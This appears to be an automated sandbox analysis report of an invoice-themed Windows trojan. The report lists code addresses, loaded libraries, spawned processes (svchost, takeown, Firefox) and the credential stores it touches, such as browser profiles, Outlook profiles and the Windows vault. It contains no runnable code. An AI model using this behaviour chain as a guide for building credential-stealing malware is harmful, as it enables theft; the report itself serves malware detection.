Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034F7D73	6_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345FDC0	6_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B9C32	6_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FFCF2	6_2_034FFCF2
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DA352	10_2_035DA352
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0352E3F0	10_2_0352E3F0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035E03E6	10_2_035E03E6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035C0274	10_2_035C0274
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035A02C0	10_2_035A02C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035A8158	10_2_035A8158
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035BA118	10_2_035BA118
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03510100	10_2_03510100
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035D81CC	10_2_035D81CC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035E01AA	10_2_035E01AA
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035D41A2	10_2_035D41A2
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035B2000	10_2_035B2000
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03544750	10_2_03544750
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03520770	10_2_03520770
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0351C7C0	10_2_0351C7C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0353C6E0	10_2_0353C6E0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03520535	10_2_03520535
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035E0591	10_2_035E0591
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035D2446	10_2_035D2446
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035C4420	10_2_035C4420
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035CE4F6	10_2_035CE4F6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DAB40	10_2_035DAB40
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035D6BD7	10_2_035D6BD7
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0351EA80	10_2_0351EA80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03536962	10_2_03536962
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035229A0	10_2_035229A0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035EA9A6	10_2_035EA9A6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03522840	10_2_03522840
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0352A840	10_2_0352A840
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0354E8F0	10_2_0354E8F0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035068B8	10_2_035068B8
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03594F40	10_2_03594F40
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03540F30	10_2_03540F30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035C2F30	10_2_035C2F30
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03562F28	10_2_03562F28
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03512FC8	10_2_03512FC8
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0352CFE0	10_2_0352CFE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0359EFA0	10_2_0359EFA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03520E59	10_2_03520E59
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DEE26	10_2_035DEE26
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DEEDB	10_2_035DEEDB
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03532E90	10_2_03532E90
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DCE93	10_2_035DCE93
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035BCD1F	10_2_035BCD1F
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0352AD00	10_2_0352AD00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0351ADE0	10_2_0351ADE0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03538DBF	10_2_03538DBF
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03520C00	10_2_03520C00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03510CF2	10_2_03510CF2
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035C0CB5	10_2_035C0CB5
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0350D34C	10_2_0350D34C
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035D132D	10_2_035D132D
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0356739A	10_2_0356739A
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0353B2C0	10_2_0353B2C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035C12ED	10_2_035C12ED
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035252A0	10_2_035252A0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0350F172	10_2_0350F172
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035EB16B	10_2_035EB16B
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0355516C	10_2_0355516C
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0352B1B0	10_2_0352B1B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035CF0CC	10_2_035CF0CC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035270C0	10_2_035270C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035D70E9	10_2_035D70E9
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DF0E0	10_2_035DF0E0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DF7B0	10_2_035DF7B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03565630	10_2_03565630
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035D16CC	10_2_035D16CC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035D7571	10_2_035D7571
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035BD5B0	10_2_035BD5B0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03511460	10_2_03511460
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DF43F	10_2_035DF43F
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DFB76	10_2_035DFB76
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03595BF0	10_2_03595BF0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0355DBF9	10_2_0355DBF9
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0353FB80	10_2_0353FB80
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DFA49	10_2_035DFA49
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035D7A46	10_2_035D7A46
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03593A6C	10_2_03593A6C
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035CDAC6	10_2_035CDAC6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03565AA0	10_2_03565AA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035BDAAC	10_2_035BDAAC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035C1AA3	10_2_035C1AA3
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03529950	10_2_03529950
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0353B950	10_2_0353B950
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035B5910	10_2_035B5910
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0358D800	10_2_0358D800
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035238E0	10_2_035238E0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DFF09	10_2_035DFF09
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_034E3FD5	10_2_034E3FD5
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_034E3FD2	10_2_034E3FD2
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03521F92	10_2_03521F92
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DFFB1	10_2_035DFFB1
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03529EB0	10_2_03529EB0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035D1D5A	10_2_035D1D5A
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03523D40	10_2_03523D40
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035D7D73	10_2_035D7D73
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0353FDC0	10_2_0353FDC0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_03599C32	10_2_03599C32
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035DFCF2	10_2_035DFCF2
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B21AA0	10_2_02B21AA0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B1CB20	10_2_02B1CB20
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B1AB10	10_2_02B1AB10
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B1C900	10_2_02B1C900
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B1AC60	10_2_02B1AC60
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B1AC54	10_2_02B1AC54
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B113A1	10_2_02B113A1
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B23360	10_2_02B23360
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B2335C	10_2_02B2335C
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B25140	10_2_02B25140
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B3B8C0	10_2_02B3B8C0
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0338E215	10_2_0338E215
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0338E0F8	10_2_0338E0F8
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0338D678	10_2_0338D678
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_0338E5AC	10_2_0338E5AC

Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 0358EA12 appears 86 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 0350B970 appears 277 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 03567E54 appears 111 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 03555130 appears 58 times
Source: C:\Windows\SysWOW64\takeown.exe	Code function: String function: 0359F290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03487E54 appears 111 times
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: String function: 00750AE3 appears 70 times
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: String function: 00737DE1 appears 36 times
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: String function: 00758900 appears 42 times

Source: Invoice Remittance ref20250226.exe, 00000001.00000003.1296891057.0000000004303000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Invoice Remittance ref20250226.exe
Source: Invoice Remittance ref20250226.exe, 00000001.00000003.1297034752.00000000044AD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Invoice Remittance ref20250226.exe
Source: Invoice Remittance ref20250226.exe, 00000001.00000003.1281604923.00000000044AD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Invoice Remittance ref20250226.exe

Source: Invoice Remittance ref20250226.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@17/10

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_0079A06A GetLastError,FormatMessageW,

1_2_0079A06A

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007881CB AdjustTokenPrivileges,CloseHandle,		1_2_007881CB
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007887E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		1_2_007887E1

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_0079B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

1_2_0079B333

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007AEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

1_2_007AEE0D

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007A83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

1_2_007A83BB

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00734E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

1_2_00734E89

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut4684.tmp

Jump to behavior

Source: Invoice Remittance ref20250226.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: takeown.exe, 0000000A.00000003.1686745575.000000000311D000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3723139760.0000000003114000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1683730458.0000000003114000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3723139760.0000000003141000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Invoice Remittance ref20250226.exe	ReversingLabs: Detection: 52%
Source: Invoice Remittance ref20250226.exe	Virustotal: Detection: 37%

Source: unknown	Process created: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe"
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe"
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"
Source: C:\Windows\SysWOW64\takeown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Invoice Remittance ref20250226.exe"	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	Process created: C:\Windows\SysWOW64\takeown.exe "C:\Windows\SysWOW64\takeown.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\takeown.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\takeown.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Invoice Remittance ref20250226.exe

Static file information: File size 1168384 > 1048576

Source: Invoice Remittance ref20250226.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Invoice Remittance ref20250226.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Invoice Remittance ref20250226.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Invoice Remittance ref20250226.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Invoice Remittance ref20250226.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Invoice Remittance ref20250226.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Invoice Remittance ref20250226.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: takeown.pdbGCTL source: svchost.exe, 00000006.00000003.1455827915.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1455726353.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1455802780.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, b7xVJvvK.exe, 00000008.00000002.3723141717.000000000077E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Invoice Remittance ref20250226.exe, 00000001.00000003.1295599035.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, Invoice Remittance ref20250226.exe, 00000001.00000003.1295722632.0000000004380000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1382927792.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1488041906.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1381301656.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1488041906.000000000359E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3725905199.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3725905199.000000000367E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1487695493.000000000318B000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1489558937.0000000003336000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: takeown.pdb source: svchost.exe, 00000006.00000003.1455827915.0000000002E26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1455726353.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1455802780.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, b7xVJvvK.exe, 00000008.00000002.3723141717.000000000077E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Invoice Remittance ref20250226.exe, 00000001.00000003.1295599035.00000000041E0000.00000004.00001000.00020000.00000000.sdmp, Invoice Remittance ref20250226.exe, 00000001.00000003.1295722632.0000000004380000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000006.00000003.1382927792.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1488041906.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1381301656.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.1488041906.000000000359E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000A.00000002.3725905199.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3725905199.000000000367E000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1487695493.000000000318B000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1489558937.0000000003336000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: takeown.exe, 0000000A.00000002.3723139760.000000000308E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3726476192.0000000003B0C000.00000004.10000000.00040000.00000000.sdmp, b7xVJvvK.exe, 0000000B.00000002.3725702322.000000000338C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1802524063.0000000014F9C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: takeown.exe, 0000000A.00000002.3723139760.000000000308E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3726476192.0000000003B0C000.00000004.10000000.00040000.00000000.sdmp, b7xVJvvK.exe, 0000000B.00000002.3725702322.000000000338C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.1802524063.0000000014F9C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: b7xVJvvK.exe, 00000008.00000002.3724366113.0000000000E6F000.00000002.00000001.01000000.00000006.sdmp, b7xVJvvK.exe, 0000000B.00000000.1566850680.0000000000E6F000.00000002.00000001.01000000.00000006.sdmp

Source: Invoice Remittance ref20250226.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Invoice Remittance ref20250226.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Invoice Remittance ref20250226.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Invoice Remittance ref20250226.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Invoice Remittance ref20250226.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00734B37 LoadLibraryA,GetProcAddress,

1_2_00734B37

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0073C4C7 push A30073BAh; retn 0073h	1_2_0073C50D
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00758945 push ecx; ret	1_2_00758958
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00418800 push ebx; ret	6_2_00418805
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041A10F push edi; iretd	6_2_0041A11E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041A113 push edi; iretd	6_2_0041A11E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00408138 push es; ret	6_2_00408139
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041A1C6 push edi; iretd	6_2_0041A1C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004139B1 push esp; ret	6_2_00413A0A
